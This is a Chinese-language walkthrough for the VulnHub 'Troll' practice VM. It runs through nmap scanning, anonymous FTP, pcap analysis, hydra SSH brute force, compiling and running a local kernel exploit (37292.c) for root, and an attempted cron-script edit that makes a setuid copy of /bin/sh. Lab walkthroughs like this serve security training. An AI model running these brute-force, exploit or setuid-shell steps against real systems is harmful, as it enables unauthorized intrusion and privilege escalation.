vulnhub-troll通关教程
这里的靶机是192.168.138攻击机是192.168.135.131
预先不知道靶机IP,攻击机IP每个人也不同先看攻击机IP在NAT下扫网段存活主机
Nmap -sP 192.168.135.0/24

知道靶机IP后直接扫IP看开放端口
Nmap 192.168.135.138

FTP都来了那就做一次全开放,能获得更多信息
Nmap -sS -sV -A -T5 -p- 192.168.135.138

我们发现ftp允许默认登录,用户名都出来了Anonymous,还有lol.pcap也走这里我们登录ftp
ftp 192.168.135.138

在这里我们确实可以看到lol.pcap

我们将其下载到我们的桌面,是桌面打开的ftp默认放桌面
Get lol.pcap

我们打开wires hark来查看里面的信息,我说过我喜欢这样先给权限
Wireshark lol.pcap

我们右键选择追踪tcp流,发现里面有一个txt文件路径

我们将eq改为1查看果然是这个路径

当我们慢慢枚举时就发现了这个文件下的秘密,由于是流量包里流出的,我们应该先试试看看能不能访问这个。当成目录后缀访问网站

sup3rs3cr3tdirlol
果然我们发现了能够访问,而且有一个信息能够下载

我们看看里面到底是什么
File

ELF是个二进制文件,这个难怪直接打开无法运行我们看看里面写了什么
Strings roflmao

这里东西太乱了,不过好在我们能看到熟悉的,找到一个地址我们继续访问它

这下可有东西了啊,我们分别访问他们看看


有一个是密码,这么多用户名,那就直接hydra试试,先将他们下到桌面
wget http://192.168.135.138/0x0856BF/good_luck/which_one_lol.txt
wget http://192.168.135.138/0x0856BF/this_folder_contains_the_password/

我都是习惯下完直接赋予777,我们用hydra试试看有没有收获
Hydra -L which_one_lol.txt -p pass.txt 192.168.135.138 ssh
这里你是不是好奇为什么第一关是pop这里是ssh,我们要看它开放那些端口的,如果都开了那就是两个都要爆破,毕竟你不知道到底是谁的用户名和密码

Ok我们成功的到一个用户的ssh登录凭证 overflow Pass.txt
Ssh overflow@192.168.135.138

我们先将他变成正常shell,再看看他的版本,方便我们搜索exp
Python -c ‘ import pty;pty.spawn(“/bin/bash”)’
Uname -a


我们看看有没有能用的现成exp
Searchsploit Linux 3.13.0


看看完整的地址方便我们利用
Searchsploit -p 37292.c

放到我们桌面,我习惯777
cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/桌面

这里不作过多解释了,开启服务
Python -m http.server 8000

这个也说很多遍了进入tmp
Cd /tmp

编译后运行exp直接就提权了
Gcc 37292.c -o yang
./yang

直接就获得了flag

第二种提权方法是修改自动任务,但是我还没用第二种方法成功过
大致思路是找到可执行文件下的自动任务日志,看到里面有自动执行清理的命令,将其强制修改为指向yang提权文件并执行
find / -name cronlog 2>/dev/null

cat /var/log/cronlog

find / -name cleaner.py 2>/dev/null

cat /lib/log/cleaner.py

强制修改成下面的代码,这里被我改坏了Q_Q
os.system('cp /bin/sh /tmp/yang')
os.system('chmod u+s /tmp/yang')
放弃了,毕竟这是简单的,没必要浪费时间,我打这关完全就是按流程走的,没啥难度,也不作太多解释 干就完了!!!
浙公网安备 33010602011771号